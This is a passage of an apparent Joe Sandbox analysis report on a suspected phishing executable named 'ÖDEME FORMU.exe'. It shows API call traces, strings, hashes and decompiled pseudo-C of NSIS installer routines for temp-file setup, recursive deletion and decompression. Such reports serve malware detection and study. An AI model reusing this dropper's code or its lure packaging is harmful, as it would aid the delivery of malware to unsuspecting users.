0x0040355c
0x00403562
0x00403563
0x00403569
0x00403573
0x00403587
0x00403588
0x00403589
0x0040358e
0x00403593
0x00403599
0x0040359a
0x004035a0
0x004035a7
0x004035aa
0x004035b0
0x004035b0
0x004035a7
0x004035b4
0x004035ba
0x004035ba
0x004035bd
0x004035be
0x004035bf
0x00000000
0x004035bf
0x00403496
0x00403498
0x004034a3
0x00000000
0x00000000
0x004034ab
0x004034b6
0x004034bb
0x00000000
0x004034bb
0x00403437
0x00403443
0x00403448
0x0040344d
0x0040344f
0x00000000
0x00000000
0x00000000
0x0040344f
0x00000000
0x004033ec
0x00000000
0x00000000
0x00000000
0x004033a0
0x004033a0
0x004033a0
0x004033a1
0x004033a1
0x00000000
0x004033a0
0x00000000

APIs

#17.COMCTL32 ref: 00403319
OleInitialize.OLE32(00000000), ref: 00403320
SHGetFileInfoA.SHELL32(0041F4E8,00000000,?,00000160,00000000), ref: 0040333C

Part of subcall function 00405AF4: lstrcpynA.KERNEL32(?,?,00000400,00403351,fjvkkubvvke Setup,NSIS Error), ref: 00405B01

GetCommandLineA.KERNEL32(fjvkkubvvke Setup,NSIS Error), ref: 00403351
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\#U00d6DEME FORMU.exe" ,00000000), ref: 00403364
CharNextA.USER32(00000000,"C:\Users\user\Desktop\#U00d6DEME FORMU.exe" ,00000020), ref: 0040338F
GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403422
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403437
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403443
DeleteFileA.KERNELBASE(1033), ref: 00403456
ExitProcess.KERNEL32(00000000), ref: 004034CF
OleUninitialize.OLE32(00000000), ref: 004034D4
ExitProcess.KERNEL32 ref: 004034F4
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\#U00d6DEME FORMU.exe" ,00000000,00000000), ref: 00403500
lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\#U00d6DEME FORMU.exe" ,00000000,00000000), ref: 0040350C
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403518
SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040351F
DeleteFileA.KERNEL32(0041F0E8,0041F0E8,?,00424000,?), ref: 00403569
CopyFileA.KERNEL32(C:\Users\user\Desktop\#U00d6DEME FORMU.exe,0041F0E8,00000001), ref: 0040357D
CloseHandle.KERNEL32(00000000,0041F0E8,0041F0E8,?,0041F0E8,00000000), ref: 004035AA
GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 004035FF
ExitWindowsEx.USER32(00000002,00000000), ref: 0040363B
ExitProcess.KERNEL32 ref: 0040365E

Strings

SeShutdownPrivilege, xrefs: 00403611
_?=, xrefs: 0040347D
NSIS Error, xrefs: 00403342
\Temp, xrefs: 0040343D
Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040330A
1033, xrefs: 00403451
C:\Users\user\Desktop\#U00d6DEME FORMU.exe, xrefs: 00403578
NCRC, xrefs: 004033CF
C:\Users\user\AppData\Local\Temp\, xrefs: 00403417, 0040341C, 00403436, 00403442, 004034FF, 0040350B, 00403517, 0040351E, 004035BE
C:\Users\user\AppData\Local\Temp, xrefs: 004034B1
", xrefs: 004033B1
/D=, xrefs: 004033E5
~nsu.tmp, xrefs: 004034FA
fjvkkubvvke Setup, xrefs: 00403347
C:\Users\user\AppData\Local\Temp, xrefs: 0040340D, 004034A6, 00403525, 0040352E
"C:\Users\user\Desktop\#U00d6DEME FORMU.exe" , xrefs: 00403357, 0040335D, 00403473
Error launching installer, xrefs: 0040348C
C:\Users\user\Desktop, xrefs: 00403505, 0040350A, 0040352D

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: ExitFileProcess$Directory$CurrentDeleteHandleWindowslstrcat$CharCloseCommandCopyCreateInfoInitializeLineModuleNextPathTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$"$"C:\Users\user\Desktop\#U00d6DEME FORMU.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\#U00d6DEME FORMU.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$fjvkkubvvke Setup$~nsu.tmp
API String ID: 3411505140-4121924661
Opcode ID: 462f336be7425baa29b142cb7ae5a0ad3fe5dbea02ff1f081f28f080f31ceddd
Instruction ID: 185554a669e391af13640c5e948e6a5ed170759bbde9d6c9181f60cdac0bc0dd
Opcode Fuzzy Hash: 462f336be7425baa29b142cb7ae5a0ad3fe5dbea02ff1f081f28f080f31ceddd
Instruction Fuzzy Hash: 2691E330A08341BED7216F619D49B2B7EACEB44306F44093BF541B62E2C77C9E058B6E

Uniqueness

Uniqueness Score: -1.00%

Function 00405426 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 152
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E00405426(void* __edi, void* __eflags, signed int _a4, signed int _a8) {
				void* _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t38;
				char* _t50;
				signed int _t53;
				signed int _t56;
				signed int _t62;
				signed int _t64;
				void* _t66;
				CHAR* _t67;
				signed char _t68;
				CHAR* _t71;
				char* _t75;

				_t67 = _a4;
				_t38 = E004056C8(__eflags, _t67);
				_t68 = _a8;
				_v12 = _t38;
				if((_t68 & 0x00000008) != 0) {
					_t64 = DeleteFileA(_t67); // executed
					asm("sbb eax, eax");
					_t66 =  ~_t64 + 1;
					 *0x423fa8 =  *0x423fa8 + _t66;
					return _t66;
				}
				_a4 = _t68;
				_t7 =  &_a4;
				 *_t7 = _a4 & 0x00000001;
				__eflags =  *_t7;
				if( *_t7 == 0) {
					L5:
					E00405AF4(0x421538, _t67);
					__eflags = _a4;
					if(_a4 == 0) {
						E0040562E(_t67);
					} else {
						lstrcatA(0x421538, "\*.*");
					}
					lstrcatA(_t67, 0x409010);
					_t71 =  &(_t67[lstrlenA(_t67)]); // executed
					_t38 = FindFirstFileA(0x421538,  &_v332); // executed
					__eflags = _t38 - 0xffffffff;
					_v8 = _t38;
					if(_t38 == 0xffffffff) {
						L26:
						__eflags = _a4;
						if(_a4 != 0) {
							_t32 = _t71 - 1;
							 *_t32 =  *(_t71 - 1) & 0x00000000;
							__eflags =  *_t32;
						}
						goto L28;
					} else {
						goto L9;
					}
					do {
						L9:
						_t75 =  &(_v332.cFileName);
						_t50 = E00405612( &(_v332.cFileName), 0x3f);
						__eflags =  *_t50;
						if( *_t50 != 0) {
							__eflags = _v332.cAlternateFileName;
							if(_v332.cAlternateFileName != 0) {
								_t75 =  &(_v332.cAlternateFileName);
							}
						}
						__eflags =  *_t75 - 0x2e;
						if( *_t75 != 0x2e) {
							L16:
							E00405AF4(_t71, _t75);
							__eflags = _v332.dwFileAttributes & 0x00000010;
							if((_v332.dwFileAttributes & 0x00000010) == 0) {
								E004057AC(_t67);
								_t53 = DeleteFileA(_t67);
								__eflags = _t53;
								if(_t53 != 0) {
									E00404E9F(0xfffffff2, _t67);
								} else {
									__eflags = _a8 & 0x00000004;
									if((_a8 & 0x00000004) == 0) {
										 *0x423fa8 =  *0x423fa8 + 1;
									} else {
										E00404E9F(0xfffffff1, _t67);
										_push(0);
										_push(_t67);
										E00405842();
									}
								}
							} else {
								__eflags = (_a8 & 0x00000003) - 3;
								if(__eflags == 0) {
									E00405426(_t71, __eflags, _t67, _a8);
								}
							}
							goto L24;
						}
						_t62 =  *((intOrPtr*)(_t75 + 1));
						__eflags = _t62;
						if(_t62 == 0) {
							goto L24;
						}
						__eflags = _t62 - 0x2e;
						if(_t62 != 0x2e) {
							goto L16;
						}
						__eflags =  *((char*)(_t75 + 2));
						if( *((char*)(_t75 + 2)) == 0) {
							goto L24;
						}
						goto L16;
						L24:
						_t56 = FindNextFileA(_v8,  &_v332); // executed
						__eflags = _t56;
					} while (_t56 != 0);
					_t38 = FindClose(_v8); // executed
					goto L26;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E00405D9C(_t67);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E004055E7(_t67);
							E004057AC(_t67);
							_t38 = RemoveDirectoryA(_t67); // executed
							__eflags = _t38;
							if(_t38 != 0) {
								return E00404E9F(0xffffffe5, _t67);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L30;
							}
							E00404E9F(0xfffffff1, _t67);
							_push(0);
							_push(_t67);
							return E00405842();
						}
						L30:
						 *0x423fa8 =  *0x423fa8 + 1;
						return _t38;
					}
					__eflags = _t68 & 0x00000002;
					if((_t68 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}

0x00405430
0x00405435
0x0040543a
0x0040543d
0x00405443
0x00405446
0x0040544e
0x00405450
0x00405451
0x00000000
0x00405451
0x0040545c
0x00405460
0x00405460
0x00405460
0x00405464
0x00405477
0x0040547e
0x00405483
0x00405487
0x00405497
0x00405489
0x0040548f
0x0040548f
0x004054a2
0x004054b7
0x004054b9
0x004054bf
0x004054c2
0x004054c5
0x00405582
0x00405582
0x00405586
0x00405588
0x00405588
0x00405588
0x00405588
0x00000000
0x00000000
0x00000000
0x00000000
0x004054cb
0x004054cb
0x004054d4
0x004054da
0x004054df
0x004054e2
0x004054e4
0x004054e8
0x004054ea
0x004054ea
0x004054e8
0x004054ed
0x004054f0
0x00405503
0x00405505
0x0040550a
0x00405511
0x00405529
0x0040552f
0x00405535
0x00405537
0x0040555c
0x00405539
0x00405539
0x0040553d
0x00405551
0x0040553f
0x00405542
0x00405547
0x00405549
0x0040554a
0x0040554a
0x0040553d
0x00405513
0x00405519
0x0040551b
0x00405521
0x00405521
0x0040551b
0x00000000
0x00405511
0x004054f2
0x004054f5
0x004054f7
0x00000000
0x00000000
0x004054f9
0x004054fb
0x00000000
0x00000000
0x004054fd
0x00405501
0x00000000
0x00000000
0x00000000
0x00405561
0x0040556b
0x00405571
0x00405571
0x0040557c
0x00000000
0x00405466
0x00405466
0x00405468
0x0040558c
0x0040558f
0x00405592
0x004055e4
0x004055e4
0x004055e4
0x00405594
0x00405597
0x004055a2
0x004055a7
0x004055a9
0x00000000
0x00000000
0x004055ac
0x004055b2
0x004055b8
0x004055be
0x004055c0
0x00000000
0x004055dc
0x004055c2
0x004055c6
0x00000000
0x00000000
0x004055cb
0x004055d0
0x004055d1
0x00000000
0x004055d2
0x00405599
0x00405599
0x00000000
0x00405599
0x0040546e
0x00405471
0x00000000
0x00000000
0x00000000
0x00405471

APIs

DeleteFileA.KERNELBASE(?,?,7620F560,00000000), ref: 00405446
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsz96AF.tmp\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nsz96AF.tmp\*.*,?,"C:\Users\user\Desktop\#U00d6DEME FORMU.exe" ,?,7620F560,00000000), ref: 0040548F
lstrcatA.KERNEL32(?,00409010,?,C:\Users\user\AppData\Local\Temp\nsz96AF.tmp\*.*,?,"C:\Users\user\Desktop\#U00d6DEME FORMU.exe" ,?,7620F560,00000000), ref: 004054A2
lstrlenA.KERNEL32(?,?,00409010,?,C:\Users\user\AppData\Local\Temp\nsz96AF.tmp\*.*,?,"C:\Users\user\Desktop\#U00d6DEME FORMU.exe" ,?,7620F560,00000000), ref: 004054A8
FindFirstFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsz96AF.tmp\*.*,?,?,?,00409010,?,C:\Users\user\AppData\Local\Temp\nsz96AF.tmp\*.*,?,"C:\Users\user\Desktop\#U00d6DEME FORMU.exe" ,?,7620F560,00000000), ref: 004054B9
FindNextFileA.KERNELBASE(?,00000010,000000F2,?), ref: 0040556B
FindClose.KERNELBASE(?), ref: 0040557C

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405426
\*.*, xrefs: 00405489
C:\Users\user\AppData\Local\Temp\nsz96AF.tmp\*.*, xrefs: 00405477, 0040547D, 0040548E, 004054B6
"C:\Users\user\Desktop\#U00d6DEME FORMU.exe" , xrefs: 0040545F

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\#U00d6DEME FORMU.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsz96AF.tmp\*.*$\*.*
API String ID: 2035342205-9126520
Opcode ID: 178659d5dd2b5e4005abbb3c6ac50f0bcaef0d38e253c4ce23e3dec6c8ab0d63
Instruction ID: 72c9b9ae93c356e5fbaabc5fff99037f1728fc53f432d7f95e6e75a23a32325d
Opcode Fuzzy Hash: 178659d5dd2b5e4005abbb3c6ac50f0bcaef0d38e253c4ce23e3dec6c8ab0d63
Instruction Fuzzy Hash: C941D070804A087ACB21AB358C85BEF3A6DDF01355F14847BB846B61D6C63C9E81CEAD

Uniqueness

Uniqueness Score: -1.00%

Function 00405D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 24
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405D9C(CHAR* _a4) {
				void* _t3;
				void* _t8;

				SetErrorMode(0x8001); // executed
				_t3 = FindFirstFileA(_a4, 0x422580); // executed
				_t8 = _t3; // executed
				SetErrorMode(0); // executed
				if(_t8 == 0xffffffff) {
					return 0;
				}
				FindClose(_t8); // executed
				return 0x422580;
			}

0x00405daa
0x00405db6
0x00405dbe
0x00405dc0
0x00405dc5
0x00000000
0x00405dd2
0x00405dc8
0x00000000

APIs

SetErrorMode.KERNELBASE(00008001,00000000,C:\,?,0040570B,C:\,C:\,00000000,C:\,C:\,?,"C:\Users\user\Desktop\#U00d6DEME FORMU.exe" ,7620F560,0040543A,?,7620F560), ref: 00405DAA
FindFirstFileA.KERNELBASE(?,00422580), ref: 00405DB6
SetErrorMode.KERNELBASE(00000000), ref: 00405DC0
FindClose.KERNELBASE(00000000), ref: 00405DC8

Strings

C:\, xrefs: 00405D9D

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: ErrorFindMode$CloseFileFirst
String ID: C:\
API String ID: 2885216544-3404278061
Opcode ID: 863b284ad5a92f7a1a8a6f5dd5e6c1c033b4ab17d74f49b76f5d02ce1b12dfb3
Instruction ID: a6a8c167051aeed94988b7bc9a417df50a67df51a882c0690b661480960f0059
Opcode Fuzzy Hash: 863b284ad5a92f7a1a8a6f5dd5e6c1c033b4ab17d74f49b76f5d02ce1b12dfb3
Instruction Fuzzy Hash: A8E08632B0455067C20017B46D4CE073658DF85721F208533B240B62D0D5B55C118BFA

Uniqueness

Uniqueness Score: -1.00%

Function 00406083 Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00406083() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
